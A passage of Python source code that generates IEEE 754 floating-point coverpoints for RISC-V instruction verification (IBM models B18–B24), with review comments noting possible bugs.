                rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    ir_dataset3 = ir_dataset
    # Concatenated in the same order the operand tuples were appended, so the
    # index k below pairs each coverpoint with its originating comment.
    ir_dataset = ir_dataset1 + ir_dataset2 + ir_dataset3
    coverpoints = []
    k = 0
    for c in b18_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += ir_dataset[k][1]
        coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
    (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B18 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b19(flen, opcode, ops, seed=-1):
    '''
    IBM Model B19 Definition:
    This model checks various possible differences between the two inputs.
    A test-case will be created for each combination of the following table::
        First input    Second input    Difference between exponents    Difference between significands
        +Normal        +Normal         >0                              >0
        -Normal        -Normal         =0                              =0
        +SubNormal     +SubNormal      <0                              <0
        -SubNormal     -SubNormal
        0              0
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int
    Abstract Dataset Description:
    Operand1 {operation} Operand2 = Derived from the table above
    Implementation:
    - Normal (positive and negative), subnormal (positive and negative) arrays are randomly initialized within their respectively declared ranges.
    - The difference between exponents and significands are formed as per the conditions in the table.
    - All possible combinations of the table are used in creating the test-cases.
    - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
    - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    # Strip the precision suffix ('.s'/'.d') to get the base opcode.
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    # Width-dependent extreme values used as bounds for random operand picks.
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.7fffffp-126'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
        limnum = maxnum
    elif flen == 64:
        ieee754_maxnorm = '0x1.fffffffffffffp+1023'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.0000000000001p-1022'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
        ieee754_limnum = '0x1.fffffffffffffp+507'
        limnum = float.fromhex(ieee754_limnum)
    if seed == -1:
        # Fixed per-opcode seeds keep the generated coverpoints reproducible.
        if opcode in 'fmin':
            random.seed(0)
        elif opcode in 'fmax':
            random.seed(1)
        elif opcode in 'flt':
            random.seed(2)
        elif opcode in 'feq':
            random.seed(3)
        elif opcode in 'fle':
            random.seed(3)
    else:
        random.seed(seed)
    b19_comb = []
    comment = []
    # Five random samples from each class of the table.
    normal = []
    normal_neg = []
    sub_normal = []
    sub_normal_neg = []
    zero = [[0e0,'Zero']]
    for i in range(5):
        normal.append([random.uniform(1,maxnum),'Normal'])
        normal_neg.append([random.uniform(-1*maxnum,-1),'-Normal'])
        sub_normal.append([random.uniform(minsubnorm,maxsubnorm),'Subnormal'])
        sub_normal_neg.append([random.uniform(-1*maxsubnorm,-1*minsubnorm),'-Subnormal'])
    all_num = normal + normal_neg + sub_normal + sub_normal_neg + zero
    # For every ordered pair, split each value into decimal significand and
    # exponent, then recombine them to realize every >/=/< relationship
    # between the operands' significands and exponents.
    for i in all_num:
        for j in all_num:
            if i[0] != 0:
                i_sig = str(i[0]).split('e')[0]
                i_exp = str(i[0]).split('e')[1]
            else:
                i_sig = '0'
                i_exp = '0'
            if j[0] != 0:
                j_sig = str(j[0]).split('e')[0]
                j_exp = str(j[0]).split('e')[1]
            else:
                j_sig = '0'
                j_exp = '0'
            if float(i_sig) >= float(j_sig): sig_sign = '>='
            else: sig_sign = '<'
            if float(i_exp) >= float(j_exp): exp_sign = '>='
            else: exp_sign = '<'
            rs1 = float(i_sig+'e'+i_exp)
            rs2 = float(j_sig+'e'+j_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
            rs1 = float(i_sig+'e'+j_exp)
            rs2 = float(j_sig+'e'+i_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + i[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs2_exp ' + exp_sign + ' rs1_exp')
            rs1 = float(j_sig+'e'+i_exp)
            rs2 = float(i_sig+'e'+j_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + i[1] + ', rs2_sigificand ' + sig_sign + ' rs1_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
            rs1 = float(i_sig+'e'+j_exp)
            rs2 = float(j_sig+'e'+j_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand ' + sig_sign + ' rs2_significand' + ', rs1_exp = rs2_exp')
            rs1 = float(i_sig+'e'+i_exp)
            rs2 = float(i_sig+'e'+j_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + j[1] + ', rs1_sigificand = rs2_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
            rs1 = float(i_sig+'e'+i_exp)
            rs2 = float(i_sig+'e'+i_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + i[1] + ', rs1_sigificand = rs2_significand, rs1_exp = rs2_exp')
    coverpoints = []
    k = 0
    for c in b19_comb:
        cvpt = ""
        for x in range(1, 3):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        # Rounding mode chosen per opcode group (0/1/2 spread across groups).
        if opcode in ["fadd","fsub","fmul","fdiv","fsqrt","fmadd","fnmadd","fmsub","fnmsub","fcvt","fmv","fle","fmv","fmin","fsgnj"]:
            cvpt += 'rm_val == 0'
        elif opcode in ["fclass","flt","fmax","fsgnjn"]:
            cvpt += 'rm_val == 1'
        elif opcode in ["feq","flw","fsw","fsgnjx"]:
            cvpt += 'rm_val == 2'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
    (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B19 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b20(flen, opcode, ops, seed=-1):
    '''
    IBM Model B20 Definition:
    This model will create test-cases such that the significand of the intermediate results will cover each of the following patterns:
    Mask on the intermediate result significand (excluding the leading “1” )
    .. code-block::
        xxx...xxx10
        xxx...xx100
        xxx...x1000
        …
        xx1...00000
        x10...00000
        100...00000
        000...00000
    The sticky bit of the intermediate result should always be 0. In case of the remainder operation, we will look at the result of the division in order to find the interesting test-cases.
    Operation: Divide, Square-root.
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int
    Abstract Dataset Description:
    Intermediate Results = [Random bits are taken initially to form xxx...xxx10. The pattern described above is then formed]
    Operand1 {operation} Operand2 = Intermediate Results
    Implementation:
    - A loop is initiated where random bits are obtained for which the subsequent sign, exponent is calculated for the intermediate value and stored in the ir_dataset.
    - Operand 1 (rs1) is randomly initialized in the range (1, limnum) and the subsequent operator value is found.
    - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
    - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    # Strip the precision suffix ('.s'/'.d') to get the base opcode.
    opcode = opcode.split('.')[0]
    # High Decimal precision so the flen==64 arithmetic does not lose bits.
    getcontext().prec = 60
    if seed == -1:
        # Fixed per-opcode seeds keep the generated coverpoints reproducible.
        if opcode in 'fdiv':
            random.seed(1)
        elif opcode in 'fsqrt':
            random.seed(2)
    else:
        random.seed(seed)
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.7fffffp-126'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
        limnum = maxnum
        ir_dataset = []
        # Build significands matching pattern X*1 0*: i random bits, a '1',
        # then trailing zeroes (sticky bit stays 0), with a random sign and
        # 8-bit exponent. 5 samples per pattern position.
        for i in range(1,21,1):
            for k in range(5):
                bits = random.getrandbits(i)
                bits = bin(bits)[2:]
                front_zero = i-len(bits)
                bits = '0'*front_zero + bits
                trailing_zero = 22-i
                sig = bits+'1'+'0'*trailing_zero
                exp = random.getrandbits(8)
                exp = '{:08b}'.format(exp)
                sgn = random.getrandbits(1)
                sgn = '{:01b}'.format(sgn)
                ir_bin = ('0b'+sgn+exp+sig)
                # Leading '1' forces a full-width hex string; it is sliced off.
                ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
                ir_dataset.append([ir, ' | Intermediate result significand: ' + sig + ' Pattern: ' + 'X'*i + '1' + '0'*trailing_zero])
        # Edge patterns: 100...0 and the all-zero significand.
        sig = '1'+'0'*22
        exp = random.getrandbits(8)
        exp = '{:08b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '1' + '0'*22])
        sig = '0'*23
        exp = random.getrandbits(8)
        exp = '{:08b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '0' + '0'*22])
    elif flen == 64:
        ieee754_maxnorm = '0x1.fffffffffffffp+1023'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.0000000000001p-1022'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
        ieee754_limnum = '0x1.fffffffffffffp+507'
        limnum = float.fromhex(ieee754_limnum)
        ir_dataset = []
        # Same scheme as flen==32 but with a 52-bit significand and an
        # 11-bit exponent field.
        for i in range(1,50,1):
            for k in range(5):
                bits = random.getrandbits(i)
                bits = bin(bits)[2:]
                front_zero = i-len(bits)
                bits = '0'*front_zero + bits
                trailing_zero = 51-i
                sig = bits+'1'+'0'*trailing_zero
                exp = random.getrandbits(11)
                exp = '{:011b}'.format(exp)
                sgn = random.getrandbits(1)
                sgn = '{:01b}'.format(sgn)
                ir_bin = ('0b'+sgn+exp+sig)
                ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
                ir_dataset.append([ir, ' | Intermediate result significand: ' + sig + ' Pattern: ' + 'X'*i + '1' + '0'*trailing_zero])
        sig = '1'+'0'*51
        # Bug fix: a double's exponent field is 11 bits wide. The original
        # code drew only 8 bits here ('{:08b}'), yielding a 61-bit encoding
        # instead of 64 and a mis-decoded intermediate value.
        exp = random.getrandbits(11)
        exp = '{:011b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '1' + '0'*51])
        sig = '0'*52
        # Bug fix: 11-bit exponent here as well (was 8 bits).
        exp = random.getrandbits(11)
        exp = '{:011b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        ir_dataset.append([ir, 'Intermediate result significand: ' + sig + ' Pattern: ' + '0' + '0'*52])
    # Solve backwards for the second operand so that the operation reproduces
    # the intermediate result: rs2 = rs1/ir for fdiv, rs2 = ir*ir for fsqrt.
    b20_comb = []
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1, limnum)
        if opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        # fsqrt takes a single operand; fdiv takes two.
        if opcode in ['fdiv']:
            b20_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b20_comb.append((floatingPoint_tohex(flen,float(rs2)),))
    coverpoints = []
    k=0
    for c in b20_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += ir_dataset[k][1]
        coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
    (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B20 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b21(flen, opcode, ops):
    '''
    IBM Model B21 Definition:
    Exercises the Divide-By-Zero exception flag for divide/remainder by
    pairing every special operand class with every other one:
    First Operand : 0, Random non-zero number, Infinity, NaN
    Second Operand : 0, Random non-zero number, Infinity, NaN
    Operation: Divide, Remainder
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :type flen: int
    :type opcode: str
    :type ops: int
    Abstract Dataset Description:
    Final Results = [ Zero, Subnorm, Norm, Infinity, DefaultNaN, QNaN, SNaN ]
    Implementation:
    - Collect the width-appropriate special encodings into one dataset.
    - Form the full cross product over `ops` operand slots with itertools.
    - Each operand tuple is expanded into per-field constraints via
      extract_fields, annotated with a human-readable value comment, and
      finally normalised through comments_parser.
    '''
    # Special-value dataset for the requested register width.
    if flen == 32:
        basic_types = fzero + fsubnorm + fnorm + finfinity + fdefaultnan \
            + [fqnan[0], fqnan[3]] + [fsnan[0], fsnan[3]]
    elif flen == 64:
        basic_types = dzero + dsubnorm + dnorm + dinfinity + ddefaultnan \
            + [dqnan[0], dqnan[1]] + [dsnan[0], dsnan[1]]
    else:
        logger.error('Invalid flen value!')
        sys.exit(1)
    # Every ordered combination of special values, one per operand slot.
    b21_comb = list(itertools.product(basic_types, repeat=ops))
    coverpoints = []
    for operands in b21_comb:
        # Field-level constraints, each followed by its ' and ' connective.
        cvpt = ''.join(
            extract_fields(flen, operands[idx], str(idx + 1)) + ' and '
            for idx in range(ops))
        # Only division pins the rounding mode.
        if opcode.split('.')[0] in ["fdiv"]:
            cvpt += 'rm_val == 0'
        cvpt += ' # '
        # Human-readable operand values for the trailing comment.
        cvpt += ' and '.join(
            'rs' + str(idx + 1) + '_val=='
            + num_explain(flen, operands[idx]) + '(' + str(operands[idx]) + ')'
            for idx in range(ops))
        coverpoints.append(cvpt)
    total = len(coverpoints)
    width = 32 if flen == 32 else 64
    logger.info('Generated' + ' ' * (5 - len(str(total))) + str(total) + ' '
        + str(width) + '-bit coverpoints using Model B21 for ' + opcode + ' !')
    return comments_parser(coverpoints)
def ibm_b22(flen, opcode, ops, seed=10):
    '''
    IBM Model B22 Definition:
    This model creates test cases for each of the following exponents (unbiased):
    1. Smaller than -3
    2. All the values in the range [-3, integer width+3]
    3. Larger than integer width + 3
    For each exponent two cases will be randomly chosen, positive and negative.
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Defaults to 10 in this model; only when -1 is passed is the seed chosen per-opcode. NOTE(review): other models default to -1 — confirm this default is intentional.)
    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int
    Abstract Dataset Description:
    Operand1 = [Smaller than -3, All the values in the range [-3, integer width+3], Larger than integer width + 3]
    Implementation:
    - Random bits are calculated and appended to obtain the exponent ranges defined in case 2.
    - To satisfy case 1 and case 3, similar steps are performed outside the loop and hence updated in the loop.
    - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
    - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    # Keep only the first two dotted components, e.g. 'fcvt.w.s' -> 'fcvt.w'.
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    # NOTE(review): after the reassignment above, opcode[2] is the third char
    # of e.g. 'fcvt.w' ('v'), so these two checks never fire for fcvt.* names;
    # flen effectively stays as passed in. Confirm the intended precision check.
    if opcode[2] == 's': flen = 32
    elif opcode[2] == 'd': flen = 64
    getcontext().prec = 40
    # Destination integer width: 32 for .w/.wu conversions, 64 for .l/.lu.
    xlen = 0
    if opcode in 'fcvt.w':
        xlen = 32
    elif opcode in 'fcvt.l':
        xlen = 64
    elif opcode in 'fcvt.wu':
        xlen = 32
    elif opcode in 'fcvt.lu':
        xlen = 64
    if seed == -1:
        # Fixed per-opcode seeds keep the generated coverpoints reproducible.
        if opcode in 'fcvt.w':
            random.seed(0)
        elif opcode in 'fcvt.l':
            random.seed(1)
        elif opcode in 'fcvt.wu':
            random.seed(2)
        elif opcode in 'fcvt.lu':
            random.seed(3)
    else:
        random.seed(seed)
    b22_comb = []
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.7fffffp-126'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
        limnum = maxnum
        op_dataset = []
        # Case 2: every biased exponent in [124, xlen+130), i.e. unbiased
        # exponents spanning roughly [-3, integer width+3]; random mantissa/sign.
        for i in range(124,xlen+130,1):
            bits = random.getrandbits(23)
            bits = bin(bits)[2:]
            front_zero = 23-len(bits)
            sig = '0'*front_zero + bits
            exp = i
            exp = '{:08b}'.format(exp)
            sgn = random.getrandbits(1)
            sgn = '{:01b}'.format(sgn)
            ir_bin = ('0b'+sgn+exp+sig)
            # Leading '1' forces a full-width hex string; it is sliced off.
            op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
            op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent in the range [-3, integer width+3]'])
            b22_comb.append((floatingPoint_tohex(flen,float(op)),))
        # Case 1: one sample with a biased exponent below 124 (unbiased < -3).
        bits = random.getrandbits(23)
        bits = bin(bits)[2:]
        front_zero = 23-len(bits)
        sig = '0'*front_zero + bits
        exp = random.randint(0,124)
        exp = '{:08b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent less than -3'])
        b22_comb.append((floatingPoint_tohex(flen,float(op)),))
        # Case 3: one sample above the upper bound (unbiased > width+3).
        bits = random.getrandbits(23)
        bits = bin(bits)[2:]
        front_zero = 23-len(bits)
        sig = '0'*front_zero + bits
        exp = random.randint(xlen+130,255)
        exp = '{:08b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent greater than (integer width+3)'])
        b22_comb.append((floatingPoint_tohex(flen,float(op)),))
    elif flen == 64:
        ieee754_maxnorm = '0x1.fffffffffffffp+1023'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.0000000000001p-1022'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
        ieee754_limnum = '0x1.fffffffffffffp+507'
        limnum = float.fromhex(ieee754_limnum)
        op_dataset = []
        # Same three cases for doubles (52-bit mantissa, 11-bit exponent, bias 1023).
        for i in range(1020,xlen+1026,1):
            bits = random.getrandbits(52)
            bits = bin(bits)[2:]
            front_zero = 52-len(bits)
            sig = '0'*front_zero + bits
            exp = i
            exp = '{:011b}'.format(exp)
            sgn = random.getrandbits(1)
            sgn = '{:01b}'.format(sgn)
            ir_bin = ('0b'+sgn+exp+sig)
            op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
            op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent in the range [-3, integer width+3]'])
            b22_comb.append((floatingPoint_tohex(flen,float(op)),))
        bits = random.getrandbits(52)
        bits = bin(bits)[2:]
        front_zero = 52-len(bits)
        sig = '0'*front_zero + bits
        exp = random.randint(0,1020)
        exp = '{:011b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent less than -3'])
        b22_comb.append((floatingPoint_tohex(flen,float(op)),))
        bits = random.getrandbits(52)
        bits = bin(bits)[2:]
        front_zero = 52-len(bits)
        sig = '0'*front_zero + bits
        exp = random.randint(xlen+1026,2047)
        exp = '{:011b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent greater than (integer width+3)'])
        b22_comb.append((floatingPoint_tohex(flen,float(op)),))
    coverpoints = []
    k=0
    for c in b22_comb:
        cvpt = ""
        # Conversions take a single source register, hence range(1, 2).
        for x in range(1, 2):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += op_dataset[k][1]
        coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
    (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B22 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b23(flen, opcode, ops):
    '''
    IBM Model B23 Definition:
        This model creates boundary cases for the rounding to integers that might cause Overflow.
        A test case will be created with inputs equal to the maximum integer number in the destination's format (MaxInt), or close to it. In particular, the following FP numbers will be used:

        1. ±MaxInt
        2. ±MaxInt ± 0.01 (¼)
        3. ±MaxInt ± 0.1 (½)
        4. ±MaxInt ± 0.11 (¾)
        5. ±MaxInt ± 1

        Rounding Mode: All

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :type flen: int
    :type opcode: str
    :type ops: int

    Abstract Dataset Description:
        Operand 1 = [ MaxInt-4, MaxInt+5 ]

    Implementation:
        - For every offset in [-4, 4] the hexadecimal encoding of MaxInt plus that
          offset is appended to the dataset, with MaxInt's IEEE 754 encoding chosen
          according to flen (32 or 64 bit).
        - Since this model is meant for floating point conversion instructions, only one operand is expected.
        - The operand values are passed into the extract_fields function to get the
          individual fields of a floating point number (sign, exponent and mantissa).
        - Coverpoints are appended with every rounding mode for the opcode.
    '''
    # Keep only the first two dot-separated fields of the opcode (e.g. "fcvt.w.s" -> "fcvt.w").
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    getcontext().prec = 40  # high Decimal precision, kept for parity with the sibling models
    dataset = []
    if flen == 32:
        maxnum = 0x4f000000  # MaxInt (2**31-1) in IEEE 754 single-precision encoding
    elif flen == 64:
        maxnum = 0x43e0000000000000  # MaxInt (2**63-1) in IEEE 754 double-precision encoding
    else:
        maxnum = None  # unsupported flen: emit no coverpoints (matches original behavior)
    if maxnum is not None:
        for i in range(-4, 5):
            dataset.append((hex(maxnum + i), "| MaxInt + ({})".format(i)))
    coverpoints = []
    for c in dataset:
        for rm in range(0, 5):
            cvpt = ""
            # Operand field constraints (sign/exponent/mantissa) per operand.
            for x in range(1, ops+1):
                cvpt += (extract_fields(flen, c[x-1], str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '
            # NOTE(review): `opcode in "fcvt.d.s"` tests whether opcode is a
            # *substring* of "fcvt.d.s" (so "fcvt.d" matches too); preserved
            # as-is — confirm the substring direction is intended.
            if "fmv" in opcode or opcode in "fcvt.d.s":
                cvpt += '0'
            else:
                cvpt += str(rm)
            cvpt += ' # '
            # Human-readable comment: raw operand value(s).
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += " "+c[1]
            coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B23 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b24(flen, opcode, ops):
    '''
    IBM Model B24 Definition:
        This model creates boundary cases for rounding to integer that might cause major loss of accuracy.
        A test-case will be created for each of the following inputs:

        1. ±0
        2. ±0 ± 0.01 (¼)
        3. ±0 ± 0.1 (½)
        4. ±0 ± 0.11 (¾)
        5. ±1
        6. ±1 + 0.01 (¼)
        7. ±1 + 0.1 (½)
        8. ±1 + 0.11 (¾)

        Rounding Mode: All

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :type flen: int
    :type opcode: str
    :type ops: int

    Abstract Dataset Description:
        Operand 1 = [±0, ±0 ± 0.01, ±0 ± 0.1, ±0 ± 0.11, ±1, ±1 + 0.01, ±1 + 0.1, ±1 + 0.11]

    Implementation:
        - A nested loop over minimums, nums and the two sign choices builds the dataset above;
          the sign characters are kept only for the human-readable comment string.
